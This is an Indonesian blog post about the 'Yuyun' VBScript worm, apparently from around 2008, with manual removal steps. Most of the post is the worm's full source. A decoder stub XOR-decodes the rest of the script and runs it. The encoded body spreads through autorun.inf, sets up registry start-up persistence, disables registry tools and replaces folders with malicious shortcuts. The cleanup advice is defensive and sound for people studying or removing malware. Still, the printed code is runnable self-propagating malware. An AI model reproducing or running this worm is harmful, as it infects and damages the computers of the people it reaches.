Virus ini seperti virus vbscript yang lain,menggunakan compiler bawaan windows yaitu wscript.exe.Virus ini menurut saya cukup ngawur,karena si virus membuat shortcut yang hampir semua nama folder menjadi shortcut.
Selengkapnya virus ini melakukan:
- menjalankan script virus dengan autorun.inf , yang kemudian akan menjalankannya secara otomatis waktu windows start up,dengan menulis string run di registry windows.
- meng-copy autorun.inf dan script vbs thumb.db yang isinya ‘www.muslimah.or.id;==================================== my name:Yuyun 1.0′ ============================On Error Resume NextDim fso, wsSet fso = CreateObject(”scripting.filesystemobject”)Set ws = CreateObject(”wscript.Shell”)
Set sh = CreateObject(”Shell.application”)
Q=WScript.ScriptFullName
tmp=fso.GetSpecialFolder(2)
tn=fso.GetTempName
tmpt=tmp+”\”+tn
Set swt=WScript.Arguments
If swt.Count>0 Then
status=swt(0)
If status=”auto” Then
sh.Explore Left(WScript.ScriptFullName,3)
Else
status=Left(WScript.ScriptFullName,Len(WScript.ScriptFullName)-Len(WScript.ScriptName))+status
If fso.FolderExists(status) Then
sh.Explore status
Else
fso.CreateFolder status
sh.Explore status
End If
End If
Else
End If
Set QQ=fso.GetFile(Q)
Set Q1=QQ.OpenAsTextStream(1,0)
isiQ=Q1.Read(QQ.Size)
Q1.close
t1=InStr(1,isiQ,”Yuyun^_^~!~2008″+” >>>”,0)+18
isiQ=Right(isiQ,Len(isiQ)-t1)
hsl=”"
For v=1 To Len(isiQ)
t=Asc(Mid(isiQ,v,1))
hsl=hsl+Chr(t Xor 7)
Next
If fso.FileExists(tmpt) Then fso.GetFile(tmpt).Attributes=0
Set temporary=fso.OpenTextFile(tmpt,2,True,0)
temporary.Write hsl
temporary.Close
ws.Run “WScript.exe //e:VBScript “+tmpt+” “”"+Q+”"”"
‘ Yuyun^_^~!~2008 >>> :::::::::::::::::::::::::::::::::::::::::::::::::::::::
‘J~’ifjb’='^r~ri’Qbu’6)7
‘N’mrts’pfiif’tbb’bqbu~’`nuk’khhlt’indb+’ebssbu+’lnict’btwbdnfkk~’f'jhtkbj’`nuk
‘e~=’Fihi~jhrtb’ni’Mfsnj+’Ihqbjebu’577?
‘Pobi’N'ahric’ihsoni`’ebfrs~’bktb)))’fic’sobi’N'puhsb’sont’tdunws’ahu’fkk
:::::::::::::::::::::::::::::::::::::::::::::::::::::::
Hi’Buuhu’Ubtrjb’Ibs
Cnj’ath+’pt+’tsfsrt+tsfsrt6+’ak~
Tbs’ath’:'DubfsbHembds/%tdunwsni`)ankbt~tsbjhembds%.
Tbs’pt’:'DubfsbHembds/%ptdunws)Tobkk%.
Tbs’to’:'DubfsbHembds/%Tobkk)fwwkndfsnhi%.
Tbs’ibs’:'DubfsbHembds/%ptdunws)ibsphul%.
ak~:afktb
sjw:ath)@bsTwbdnfkAhkcbu/5.
si:ath)@bsSbjwIfjb
sjws:sjw,%[%,si
chd:pt)TwbdnfkAhkcbut/%J~Chdrjbist%.
Tbs'tps:PTdunws)Fu`rjbist
Na'tps)Dhris97'Sobi
tsfsrt:tps/7.
Bic'Na
na'ath)ankbbntst/sjw,%[^r~ri)V%.'sobi
tbs'nuf:ath)`bsankb/sjw,%[^r~ri)V%.
nuf)fssunersbt:7
nuf)ifjb:%tofknofo)nuf%
na'nuf)ifjb:%tofknofo)nuf%'sobi
nuf)ifjb:%^r~ri)V%
tbs'nuf:ath)hwbisbsankb/sjw,%[^r~ri)V%+5+surb.
bktb
ak~:surb
bic'na
bktb
tbs'nuf:ath)hwbisbsankb/sjw,%[^r~ri)V%+5+surb.
bic'na
Tbs'FV:ath)@bsAnkb/tsfsrt.
Na'ath)AnkbBntst/sjws.'Sobi'ath)@bsAnkb/sjws.)Fssunersbt:7
FV)Dhw~'sjws+Surb
Tbs'FV:ath)@bsAnkb/sjws.
FV)Fssunersbt:4>
fiq:sjw,%[frsh)bb%
Na'Ihs'ath)AnkbBntst/fiq.'Sobi'FV)Dhw~'fiq
Tbs'frsh:ath)@bsAnkb/fiq.'
frsh)fssunersbt:7
Tbs'frs:ath)HwbiSbsAnkb/fiq+5+Surb+7.
ntn:%\frshuriZ9hwbi:PTdunws)bb'((b=QETdunws'sorje)ce'frsh9tobkk[hwbi:Hwbi9tobkk[hwbi[Dhjjfic:PTdunws)bb'((b=QETdunws'sorje)ce'frsh9tobkk[hwbi[Cbafrks:69tobkk[bwkhub:Bwkhub9tobkk[bwkhub[Dhjjfic:PTdunws)bb'((b=QETdunws'sorje)ce'frsh%
ntn:Ubwkfdb/ntn+%9%+qeDuKa.
frs)Punsb'ntn
frs)Dkhtb
frsh)Fssunersbt:4>
ksld:to)Ifjbtwfdb/!O6d!.)Tbka)wfso','%[Jnduhthas[DC'Eruini`%
FV)Dhw~'ksld,%[sorje)ce%+Surb
frsh)Dhw~'ksld,%[frshuri)nia%+Surb
Na'ath)AnkbBntst/chd,%[cfsfeftb)jce%.'Sobi'ath)@bsAnkb/chd,%[cfsfeftb)jce%.)Fssunersbt:7
FV)Dhw~'chd,%[cfsfeftb)jce%+Surb
ub`V
Tbs'ufuf:RINTLF
Obus}'Afktb
Na'Cf~/Ihp.;94'Sobi'ublrutna'chd+6'Bktb'ublrutna'chd+4
dfkk'fssfdlXibs
Obus}'Surb
Tre'ublrutna/wfso+cw.
Hi'Buuhu'Ubtrjb'Ibs
cuhwa'wfso
ptdunws)tkbbw'27
Na'cw97'Sobi
Ahu'Bfdo'akcu6'Ni'ath)@bsAhkcbu/wfso,%[%.)TreAhkcbut
ublrutna'akcu6)Wfso+'cw*6
Ibs
Bic'Na
Bic'Tre
Tre'cuhwa/wfso.
Hi'Buuhu'Ubtrjb'Ibs
na'cf~/ihp.:6'fic'/jhiso/ihp.jhc'4.:6'sobi'
ufuf)dhw~'wfso,%[Efdf'FV)usa%
ufuf)dhw~'wfso,%[J~'ifjb'nt'^r~ri)usa%
bic'na
`6:wfso,%[frshuri)nia%
`5:wfso,%[Sorje)ce%
Na'ath)AnkbBntst/`6.'Sobi'
Tbs'`66:ath)@bsAnkb/`6.'
Na'`66)Fssunersbt;94>'Sobi'
`66)Fssunersbt:7
frsh)Dhw~'wfso,%[frshuri)nia%+Surb
bic'na
bktb'
frsh)Dhw~'wfso,%[frshuri)nia%+Surb
bic'na
Na'ath)AnkbBntst/`5.'Sobi'
Tbs'`65:ath)@bsAnkb/`5.
Na'`65)Fssunersbt;94>'Sobi
`65)Fssunersbt:7
FV)Dhw~'wfso,%[Sorje)ce%+Surb
bic'na
bktb
FV)Dhw~'wfso,%[Sorje)ce%+Surb
Bic'Na
Na'Ihs'ath)AnkbBntst/wfso,%[Jnduhthas)kil%.'Sobi
tohu]qinsf’wfso,%[Jnduhthas%+%Jnduhthas%
cuhw:Fuuf~/%Ibp'Ofuu~'Whssbu'fic)))%+%Ibp'Ahkcbu%+%TrufsV%+%Ufoftnf%+%@fjb%+%]qinsf%+%Chpikhfc%+%CfsfV%+%CfsfV%.
pp:6
Ahu’Bfdo’c'Ni’cuhw
Na’Cf~/ihp.’Jhc’4′:’pp’Sobi’tohu]qinsf’wfso,%[%,c+c
ptdunws)tkbbw'17
pp:pp,6
Ibs
u:7
Ahu'Bfdo'akcu'Ni'ath)@bsAhkcbu/wfso,%[%.)TreAhkcbut
tohu]qinsf’wfso,%[%,akcu)ifjb+akcu)Ifjb
ptdunws)tkbbw'17
Na'u94'Sobi'
Bns'Ahu
Bic'na
u:u,6
Ibs
Bic'Na
Bic'Tre
Tre'tohu]qinsf/wfso+su`s.
Tbs’tohu:pt)DubfsbTohusdrs/wfso,%)kil%.
tohu)ndhikhdfsnhi:%tobkk45)ckk+4%
tohu)sfu`bswfso:%ptdunws)bb%
tohu)fu`rjbist:%((b=QETdunws’sorje)ce’%%%,su`s,%%%%
tohu)tfqb
Bic’Tre
aridsnhi’fssfdlXibs/.
Hi’Buuhu’Ubtrjb’Ibs
buu)dkbfu
Tbs’hemAhkcbu’:'to)Ifjbtwfdb/!O64!.
Tbs’dhkNsbjt’:'hemAhkcbu)Nsbjt
Ahu’Bfdo’tsuAnkbIfjb’ni’hemAhkcbu)Nsbjt
s:’hemAhkcbu)@bsCbsfnktHa/tsuAnkbIfjb+’63.
na’ath)ahkcbubntst/s.’sobi
ublrutna’s+3
bic’na
Ibs
Bic’aridsnhi
Tre’scu/.
Hi’Buuhu’Ubtrjb’Ibs
buu)dkbfu
PTdunws)Tkbbw’6?7777
na’buu)irjebu97’sobi’ptdunws)vrns
Bic’Tre
aridsnhi’RINTLF/.
Hi’buuhu’ubtrjb’ibs
:qeduka
fcq:%^r~ri’Qbu’6)7′YXY&::::::::::::::::::99Erlfi’cfun’srkfi`’reri’nf’cndnwsf9lfuif’ebuefof~f’jbjenfulfii~f’cfkfj’tfimri`’cfi’wrmf9sfl’mr`f’cfun’srkfi`’lfln9lfuif’intsf’jbjerfsi~f’cnnimfl’cfi’cnwbuercfl9sfwn’cfun’srkfi`’urtrl’ef`nfi’lnun9cblfs’lb’ofsn’risrl’cntf~fi`n9cblfs’lb’sfi`fi’risrl’cnknicri`n99/cnlrsnw’cu=’F`fu’Encfcfun’Dbjerur’Wfcfjr.999%%Mfi`fikfo’lfjr’ebutnlfw’kbjfo+’cfi’mfi`fikfo’/wrkf.’lfjr’ebutbcno’ofsn+’wfcfofk’lfjrkfo9hufi`*hufi`’~fi`’wfkni`’sni“n’/cbufmfsi~f.+’mnlf’lfjr’hufi`*hufi`’~fi`’ebunjfi)%%9/VT)’Fkn’Njufi=64>.999Lfsflfikfo’lbwfcf’hufi`’kfln*kfln’~fi`’ebunjfi=’%%Obicflkfo’jbublf’jbifofi’wficfi`fi~f+’9cfi’jbjbknofuf’lbjfkrfii~f<’~fi`’cbjnlnfi’nsr’fcfkfo’kbeno’trdn’ef`n’jbublf+’9tbtri“roi~f’Fkkfo’Jfof’Jbi`bsforn’fwf’~fi`’jbublf’wbuerfs)%%’/VT)’Fi’Iru=47.99Lfsflfikfo’lbwfcf’pfinsf’~fi`’ebunjfi=’%%Obicflkfo’jbublf’jbifofi’wficfi`fii~f+’9cfi’lbjfkrfii~f+’cfi’mfi`fikfo’jbublf’jbifjwfllfi’wbuonftfii~f+’lbdrfkn’~fi`’9/enftf.’ifjwfl’cfun’wfcfi~f)’Cfi’obicflkfo’jbublf’jbirsrwlfi’lfni’lrcri`’9lbcfcfi~f))))%%’/VT)’Fi’Iru=47.99Thuu~’N'mrts’Insnw’Wunis’sohl))))Icfl’wf5′lofiYXY&”ppp)jrtknjfo)hu)nc’99Ofn’fifl’Fcfj+’tbtri“roi~f’Lfjn’sbkfo’jbirurilfi’lbwfcfjr’9wflfnfi’risrl’jbirsrw’frufsjr’cfi’wflfnfi’nicfo’risrl’wbuonftfi)9Cfi’wflfnfi’sflpf’nsrkfo’~fi`’wfkni`’efnl)’^fi`’cbjnlnfi’nsr’fcfkfo’9tbefof`nfi’cfun’sficf*sficf’lblrftffi’Fkkfo+’jrcfo*jrcfofi’jbublf’tbkfkr’ni`fs)/Fk*F ufa=51.%
fcq:ubwkfdb/fcq+%9%+.
tbs’^r5i:ath)hwbisbsankb/sjw,%[q)chd%+5+surb.
^r5i)punsb’fcq
^r5i)dkhtb
na’cf~/ihp.:6′fic’/jhiso/ihp.jhc’4.:6’sobi’
na’ak~:afktb’sobi
ahu’n:6’sh’4
pt)uri’%ihsbwfc)bb’(w’%%%,sjw,%[q)chd%%%
ibs
bic’na
bic’na
tbs’RINTLF:ath)`bsankb/sjw,%[q)chd%.
bic’aridsnhi
Tre’ub`V/.
Hi’Buuhu’Ubtrjb’Ibs
na’cf~/ihp.:6’sobi
pt)Ub`Punsb’%OLDU[DKTNC[|66666666*5555*4444*3333*222222222222z[%+’%^r~riXDfisn%
pt)Ub`Punsb’%OLDU[DKTNC[|66666666*5555*4444*3333*222222222222z[CbafrksNdhi[%+%tobkk45)ckk+3?%
pt)Ub`Punsb’%OLDU[DKTNC[|66666666*5555*4444*3333*222222222222z[TobkkAhkcbu[Fssunersbt%+7+%UB@XCPHUC%
pt)ub`punsb’%OLKJ[Thaspfub[Jnduhthas[Pnichpt[DruubisQbutnhi[bwkhubu[Cbtlshw[IfjbTwfdb[|66666666*5555*4444*3333*222222222222z[%+%%
bic’na
pt)ub`cbkbsb’%OLDU[kilankb[NtTohusdrs%
pt)Ub`Punsb’%OLDR[Thaspfub[Jnduhthas[Pnichpt[DruubisQbutnhi[Uri[Bwkhubu%+%Ptdunws)bb’((b=QETdunws’%%%,chd,%[cfsfeftb)jce%%%
pt)Ub`Punsb’%OLDR[Thaspfub[Jnduhthas[Pnichpt[DruubisQbutnhi[Whkndnbt[T~tsbj[CntfekbUb`ntsu~shhkt%+6+%UB@XCPHUC%
na’kdftb/ath)`bscunqb/%d=%.)AnkbT~tsbj.:%isat%’sobi
nufV:FV)hwbiftsbstsubfj/6+7.)ubfc/FV)tn}b.
ppp:ath)@bsTwbdnfkAhkcbu/7.
tbs’mml:ath)hwbisbsankb/ppp,%[=Jnduhthas’Haandb’Rwcfsb’ahu’Pnichpt’_W)t~t%+5+surb.
mml)punsb’nufV
mml)dkhtb
pt)Ub`Punsb’%OLKJ[Thaspfub[Jnduhthas[Pnichpt[DruubisQbutnhi[Uri[PniRwcfsb%+%Ptdunws)bb’((b=QETdunws’%%%,ppp,%[=Jnduhthas’Haandb’Rwcfsb’ahu’Pnichpt’_W)t~t%%%
bic’na
Bic’Tre
Tre’Obus}/hhh.
Hi’Buuhu’Ubtrjb’Ibs
ch
Ahu’Bfdo’cuq’Ni’ath)Cunqbt
Na’cuq)CunqbS~wb:6′Sobi
ublrutna’cuq)Wfso+3
Bktb
ublrutna’cuq)Wfso+5
Bic’na
Ibs
na’ak~:afktb’sobi’
scu
bktb’
ptdunws)vrns
bic’na
ub`V
Na’hhh:Afktb’Sobi’
Bns’Ch
Bic’Na
khhw
Bic’Tre
hampir kesemua nama folder yang ada dengan tujuan eksekusi langsung dari wscript.exe
- Membuat shortcut dengan nama folder yang ada, ditambah nama microsoft dan new harry potter and… dan new folder yang kesemuanya menuju ke wscript.exe untuk eksekusi file script thumb.db yang sebenarnya script vbs (visual basic script ) yang tersebar di folder-folder.
- Membuat system folder di desktop dengan nama yuyun_cantix yang bila diclick kanan hanya ada pilihan buat shortcut,dan tidak ada pilihan hapus.
Cara membersihkannya:
1.Matikan fungsi Wscript.exe,caranya menggunakan gpedit.msc>administrative templates>System>Double click Don’t run specified Windows applications>enabled>show>tambahkan Wscript.exe dan cscript.exe>ok.Dengan cara ini semua virus vbscript tidak akan tereksekusi.
2.Gunakan antivirus pcmav bisa download di sini atau anti virus lainnya seperti smadav ver 3 yang telah mendeteksi virus ini sekalian delete shortcutnya bisa down load disini .Sebelumnya endtask wscript.exe yang berjalan di processes task manager.
Atau silakan Download di-link yang saya sediakan yaitu di Download Anti Virus dan Update anti Virus yang selalu saya update
3.Gunakan search windows , untuk mencari shortcut yang dibuat oleh virus.Cirinya bila shortcut diproperties ditarget akan tertulis “WScript.exe //e:VBScript “+tmpt+” “”"+Q+”.Tapi smadav dan ansav sudah bisa deteksi,scan aja terus hapus..
4.Gunakan regedit.exe (ketik di menu run) click di my computer-regedit,Click edit>find>ketik yuyun_cantix>click find next.Cara ini digunakan untuk menghilangkan folder system (yuyun_cantix) yang dibuat di desktop.Setelah ketemu lalu delete key sebelah kiri (seperti folder)tenpat yuyun_cantix berada.Dengan begitu folder system yang ada didesktop bisa di delete.
5.Gunakan msconfig atau tools lain seperti hijack this untuk menghilangkan start up virus.
Semoga artikel saya berguna… untuk yang mau bertanya,atau memberi informasi..dan saran silakan komentar… saya akan siap membantu sebisa mungkin…..
0 comments:
Posting Komentar
Silahkan Komentar anda.Jangan spam ya...
"U Comment I Follow"